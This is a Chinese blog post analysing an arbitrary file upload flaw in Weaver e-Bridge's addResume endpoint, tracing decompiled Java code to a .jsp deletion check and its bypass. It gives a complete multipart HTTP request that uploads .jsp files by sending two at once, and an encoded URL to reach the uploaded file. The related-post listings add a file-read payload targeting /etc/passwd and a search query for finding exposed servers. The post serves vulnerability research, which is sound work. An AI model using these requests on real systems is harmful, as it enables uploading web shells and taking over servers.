泛微云桥e-Bridge addResume 任意文件上传漏洞分析

最新推荐文章于 2024-08-29 14:20:30 发布
最新推荐文章于 2024-08-29 14:20:30 发布
阅读量298 收藏 6
点赞数 5
文章标签: 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18193739/article/details/141369602
版权

环境搭建

https://wxdownload.e-cology.com.cn/ebridge/ebridge_install_win64_server2008R2_20200819.zip

下载Windows版本的泛微云桥e-Bridge,解压后目录结构

image.png

第一次运行后需要打补丁

https://wxdownload.e-cology.com.cn/ebridge/ebridge_patch_20230724.zip

解压文件,得到一个“ROOT”文件夹,直接覆盖到自己泛微云桥目录即可

image.png

image.png

具体启动参考泛微云桥windows版安装说明.txt ,当前版本:20230724SP2

image.png

ResumeController.class

漏洞处:webapps\ROOT\WEB-INF\classes\weaver\weixin\app\recruit\controller\ResumeController.class

  @ActionKey("/wxclient/app/recruit/resume/addResume")
  @Before({Tx.class})
  public void addResume() throws Exception {
    try {
      WxBaseFile wbFile = null;
      if (getContentType().toLowerCase().startsWith("multipart/form-data"))
        wbFile = getWxBaseFile(this.wxBaseFileService, getPara("fileElementId"), null, 2097152, null); 
      ResumeModel model = (ResumeModel)getModel(ResumeModel.class, "resume");
      if (wbFile != null)
        model.set("accessory", wbFile.getId()); 
      if (this.resumeService.addResume(model, getPara("sysagentid"))) {
        renderJsonMsgForIE(", true);
      } else {
        renderJsonMsgForIE(", false);
      } 
    } catch (Exception e) {
      if (e.getMessage().indexOf("2097152") != -1) {
        renderJsonMsgForIE(", false);
      } else {
        this.log.error(e.getMessage(), e);
        renderJsonMsgForIE(", false);
      } 
      throw e;
    } 
  }

getWxBaseFile代码

image.png

      String _filePath = StrKit.isBlank(filePath) ? FileUploadTools.getRandomFilePath() : filePath;
      int _fileMaxSize = fileMaxSize == -1 ? FileUploadTools.getMaxSize() : fileMaxSize;
      String _fileEncoding = StrKit.isBlank(fileEncoding) ? FileUploadTools.getEncoding() : fileEncoding;

1、 filePath 为 null、空字符串或只包含空格,则使用 FileUploadTools.getRandomFilePath() 生成一个随机文件路径。
2、 fileMaxSize 等于 -1,则使用 FileUploadTools.getMaxSize() 获取最大文件大小(默认为 20MB)。
3、 fileEncoding 为 null、空字符串或只包含空格,则使用 FileUploadTools.getEncoding() 获取文件编码(默认为 “UTF-8”)。

   public WxBaseFile getWxBaseFile(WxBaseFileService wxBaseFileService, String parameterName, String filePath, int fileMaxSize, String fileEncoding) throws Exception {
      String _filePath = StrKit.isBlank(filePath) ? FileUploadTools.getRandomFilePath() : filePath;
      int _fileMaxSize = fileMaxSize == -1 ? FileUploadTools.getMaxSize() : fileMaxSize;
      String _fileEncoding = StrKit.isBlank(fileEncoding) ? FileUploadTools.getEncoding() : fileEncoding;
      UploadFile uf = null;

      try {
         uf = this.getFile(parameterName, _filePath, _fileMaxSize, _fileEncoding);
      } catch (Exception var11) {
         throw var11;
      }

      return this.parseUploadFile(wxBaseFileService, uf);
   }

FileUploadTools.getRandomFilePath()

image.png

   public static String initFilePath(String prePath) {
      StringBuffer sb = new StringBuffer();
      if (GCONST.getFileRootPath() != null && !"".equals(GCONST.getFileRootPath())) {
         sb.append(GCONST.getFileRootPath());
      } else {
         sb.append(PathKit.getWebRootPath() + File.separator + "upload");
      }

      if (StrKit.notBlank(prePath)) {
         sb.append(File.separator + prePath + File.separator + sdf.format(new Date()));
      } else {
         sb.append(File.separator + sdf.format(new Date()));
      }

      sb.append(File.separator + getUpEng());
      return sb.toString();
   }

   public static String getUpEng() {
      Random r = new Random();
      char c = (char)(r.nextInt(26) + 65);
      char b = (char)(r.nextInt(26) + 65);
      return String.valueOf(c) + String.valueOf(b);
   }

initFilePath方法初始化并返回一个文件路径字符串。它接受一个可选的前缀路径参数 prePath。如果 prePath 为 null 或空字符串,则使用默认前缀。

getUpEng() 方法生成的随机两字母字符串附加到路径末尾,如:/upload/202408/AB

jfinal框架 UploadFile.getFile

image.png

UploadFile uf = null;
uf = this.getFile(parameterName, _filePath, _fileMaxSize, _fileEncoding);

this.getFile 实现使用了jfinal框架的上传方法

image.png

根据Jfinal框架文档,getFile文件上传最后实现的方法wrapMultipartRequest

image.png

在80行代码中,if判断了isSafeFile

image.png

isSafeFile

在isSafeFile 方法中,传入的文件名如果是jsp后缀的,就会执行 delete() 将上传的jsp文件删除

   private boolean isSafeFile(UploadFile uploadFile) {
      if (uploadFile.getFileName().toLowerCase().endsWith(".jsp")) {
         uploadFile.getFile().delete();
         return false;
      } else {
         return true;
      }
   }

MultipartRequest 代码

从wrapMultipartRequest 方法中,发现将文件流传入的new com.oreilly.servlet.MultipartRequest

   private void wrapMultipartRequest(HttpServletRequest request, String saveDirectory, int maxPostSize, String encoding) {
      if (!isMultipartSupported) {
         throw new RuntimeException("Oreilly cos.jar is not found, Multipart post can not be supported.");
      } else {
         saveDirectory = this.handleSaveDirectory(saveDirectory);
         File dir = new File(saveDirectory);
         if (!dir.exists() && !dir.mkdirs()) {
            throw new RuntimeException("Directory " + saveDirectory + " not exists and can not create directory.");
         } else {
            this.uploadFiles = new ArrayList();

            try {
               this.multipartRequest = new com.oreilly.servlet.MultipartRequest(request, saveDirectory, maxPostSize, encoding, fileRenamePolicy);
               Enumeration files = this.multipartRequest.getFileNames();

               while(files.hasMoreElements()) {
                  String name = (String)files.nextElement();
                  String filesystemName = this.multipartRequest.getFilesystemName(name);
                  if (filesystemName != null) {
                     String originalFileName = this.multipartRequest.getOriginalFileName(name);
                     String contentType = this.multipartRequest.getContentType(name);
                     UploadFile uploadFile = new UploadFile(name, saveDirectory, filesystemName, originalFileName, contentType);
                     if (this.isSafeFile(uploadFile)) {
                        this.uploadFiles.add(uploadFile);
                     }
                  }
               }

            } catch (IOException var12) {
               throw new RuntimeException(var12);
            }
         }
      }
   }

image.png

public MultipartRequest(HttpServletRequest request, String saveDirectory, int maxPostSize, String encoding, FileRenamePolicy policy) throws IOException {
      this.parameters = new Hashtable();
      this.files = new Hashtable();
      if (request == null) {
         throw new IllegalArgumentException("request cannot be null");
      } else if (saveDirectory == null) {
         throw new IllegalArgumentException("saveDirectory cannot be null");
      } else if (maxPostSize <= 0) {
         throw new IllegalArgumentException("maxPostSize must be positive");
      } else {
         File dir = new File(saveDirectory);
         if (!dir.isDirectory()) {
            throw new IllegalArgumentException("Not a directory: " + saveDirectory);
         } else if (!dir.canWrite()) {
            throw new IllegalArgumentException("Not writable: " + saveDirectory);
         } else {
            MultipartParser parser = new MultipartParser(request, maxPostSize, true, true, encoding);
            Vector existingValues;
            if (request.getQueryString() != null) {
               Hashtable queryParameters = HttpUtils.parseQueryString(request.getQueryString());
               Enumeration queryParameterNames = queryParameters.keys();

               while(queryParameterNames.hasMoreElements()) {
                  Object paramName = queryParameterNames.nextElement();
                  String[] values = (String[])((String[])queryParameters.get(paramName));
                  existingValues = new Vector();

                  for(int i = 0; i < values.length; ++i) {
                     existingValues.add(values[i]);
                  }

                  this.parameters.put(paramName, existingValues);
               }
            }

            Part part;
            while((part = parser.readNextPart()) != null) {
               String name = part.getName();
               if (name == null) {
                  throw new IOException("Malformed input: parameter name missing (known Opera 7 bug)");
               }

               String fileName;
               if (part.isParam()) {
                  ParamPart paramPart = (ParamPart)part;
                  fileName = paramPart.getStringValue();
                  existingValues = (Vector)this.parameters.get(name);
                  if (existingValues == null) {
                     existingValues = new Vector();
                     this.parameters.put(name, existingValues);
                  }

                  existingValues.addElement(fileName);
               } else if (part.isFile()) {
                  FilePart filePart = (FilePart)part;
                  fileName = filePart.getFileName();
                  if (fileName != null) {
                     filePart.setRenamePolicy(policy);
                     filePart.writeTo(dir);
                     this.files.put(name, new UploadedFile(dir.toString(), filePart.getFileName(), fileName, filePart.getContentType()));
                  } else {
                     this.files.put(name, new UploadedFile((String)null, (String)null, (String)null, (String)null));
                  }
               }
            }

         }
      }
   }

image.png

这个部分代码处理了文件上传,将文件保存在指定目录中

      FilePart filePart = (FilePart)part;
                  fileName = filePart.getFileName();
                  if (fileName != null) {
                     filePart.setRenamePolicy(policy);
                     filePart.writeTo(dir);
                     this.files.put(name, new UploadedFile(dir.toString(), filePart.getFileName(), fileName, filePart.getContentType()));
                  } else {
                     this.files.put(name, new UploadedFile((String)null, (String)null, (String)null, (String)null));
                  }

主要需要绕过isSafeFile 函数删除jsp文件,可通过双文件上传绕过

漏洞复现

POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1
Host: 127.0.0.1:8088
Content-Length: 361
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="1.jsp"

127
------WebKitFormBoundaryD5Mawpg068t7pbxZ
Content-Disposition: form-data; name="file"; filename="222.jsp"

127
------WebKitFormBoundaryD5Mawpg068t7pbxZ--

image.png

从文件监控中,通过双文件上传,成功创建了两个文件1.jsp 222.jsp ,只有1.jsp成功上传漏洞,222.jsp被删除了

image.png

image.png

访问:http://127.0.0.1:8088/upload/202408/RE/1.js%70

image.png

yr678
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
泛微云桥(e-BridgeaddResume接口存在文件上传漏洞
m0_46604997的博客
08-28 437
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。截止自本手册编制之日e-Bridge已实现了腾讯微信及阿里钉钉开放接口的封装,企业可以通过e-Bridge快速实现基于微信及钉钉的移动办公应用接入。对于泛微协同办公产品e-cology更是实现了可视化的配置接入。后续e-bridge将整合更多的互联网信息化资源,让企业能够更加便利的利用开放的互联网资源进行企业信息化建设。
泛微云桥e-Bridge-addResume存在任意文件上传漏洞
weixin_43167326的博客
08-06 1243
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥resume接口存在任意文件上传漏洞,攻击者成功利用该漏洞,上传恶意木马控制服务器。
漏洞复现】泛微-云桥e-Bridge EC8.0 文件上传
今天是几号的博客
08-06 1166
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。泛微-云桥是一款基于云计算技术的企业级协作与办公平台,提供文档管理、流程审批、项目协作等功能,旨在提升企业内部沟通效率与工作协同能力。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
泛微云桥e-Bridge-任意文件读取漏洞
chaojixiaojingang
10-09 6590
1.资产查找 Fofa: title="泛微云桥 e-Bridge" 2.漏洞描述 泛微云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。 3.漏洞复现 1)Linux服务器 (1)在URL后添加payload payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt (2)在URL后添加/file/fileNo
漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞
qq_52612931的博客
01-02 790
由于泛微云桥e-Bridge平台addTaste接口存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取数据库权限及数据库的敏感数据。3、其他内容不修改,然后放包后即可复现。
泛微云桥e-Bridge中看jfinal相关问题
好记性不如烂笔头
08-07 940
补丁地址:https://wx.weaver.com.cn/download?from=upgrade&require=we云桥用tomcat部署,查看其web.xml。发现用了jfinal。 JFinal框架特点 JFinal 是基于Java语言的WEB + ORM 框架,基于JFinal的web项目都需要创建一个继承自JFinalConfig类的子类,该类用于对整个web项目进行配置,该子类需要实现六个抽象方法,如下。 泛微云桥中的类即为WxJFinalConfig。抽象方法实现如下。关注一下
泛微云桥e-Bridge任意文件读取
MD@@nr丫卡uer
11-28 3956
泛微云桥e-Bridge任意文件读取漏洞 0x00漏洞影响版本: 该漏洞几乎影响2018-2019全版本。 0x01漏洞利用: 默认密码sysadmin/1 fofa搜索语句:title=“泛微云桥” 主要成因 /wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以下载相关敏感文件 构造如下语句 http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/
泛微云桥0day-任意文件上传漏洞
2301_77012231的博客
08-06 272
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。攻击者可通过任意文件上传漏洞上传文件,获取服务器权限。
【复现】泛微云桥 e-Bridge SQL注入漏洞_45
fushuang333的博客
02-10 1063
【复现】泛微云桥 e-Bridge SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
泛微云桥e-Bridge安装手册
04-10
泛微云桥e-Bridge】是上海泛微公司针对“互联网+”趋势推出的一款系统集成中间件,它旨在连接互联网开放资源与企业内部信息化系统。e-Bridge已实现对腾讯微信和阿里钉钉开放接口的封装,使企业能够迅速接入基于...
漏洞复现-泛微云桥 e-Bridge SQL注入(附漏洞检测脚本)
jjjj1029056414的博客
12-12 1788
漏洞复现-泛微云桥 e-Bridge SQL注入,附带自己写的poc脚本
泛微-云桥e-Bridge SQL注入漏洞复现
0xSec
12-12 1651
由于泛微-云桥e-Bridge平台/taste/addTaste接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库权限,获取用户密码等重要凭据,使系统处于极不安全状态。
乾元通渠道商中标湖南省煤业集团公司安全生产预防和应急救援能力建设装备配备采购项目
最新发布
QDLL123的博客
08-29 147
近日,乾元通渠道商中标湖南省煤业集团安全生产预防和应急救援能力建设装备配备采购项目,乾元通作为聚合通讯保障技术厂家,为项目一标段卫星通讯指挥车提供车载聚合路由器终端及系统。
网络安全教程初级简介
网络研究观
08-26 592
网络安全包括一系列技术、流程和实践,用于保护网络、设备、应用程序和数据免受攻击、盗窃或损坏等威胁。
【宝马中国-注册/登录安全分析报告】
08-26 1276
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
Django框架安全
brucexia的专栏
08-29 799
Django框架安全中包括了保护Django驱动的网站的建议,具体内容如下:1. 跨站点脚本(XSS)保护XSS攻击使用户可以将客户端脚本注入其他用户的浏览器中。只要在包含数据到页面中之前未对数据进行充分的清理,XSS攻击就可以源自任何不受信任的数据源,例如Cookie或Web服务。使用Django模板可保护站点免受大多数XSS攻击,但更重要的是要了解其提供的保护及其限制。Django模板会转义特定字符,这对于HTML来说尤其危险。尽管这可以保护用户免受大多数恶意输入的侵害,但这并不是绝对安全的。
[ICS] 物理安全
08-26 1418
#工业控制系统气泡模型理论 #端口锁定 #物理端口安全 #设施监控 #爆炸物检测计划 #USB 端口阻塞
泛微e-bridge漏洞文件上传漏洞(CVE-2021-28368)
05-25
泛微e-bridge是一款企业信息化平台,近期被曝存在文件上传漏洞(CVE-2021-28368),攻击者可以利用此漏洞上传恶意文件,进而控制服务器或者实施其他攻击行为。 该漏洞的原因是泛微e-bridge的上传功能没有对上传文件的类型进行严格限制,导致攻击者可以上传包含恶意脚本的文件,从而造成远程命令执行、文件读取等安全风险。 目前,该漏洞已被公开披露,并且泛微已经发布了安全补丁,建议用户尽快升级到最新版本以避免遭受攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yr678

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值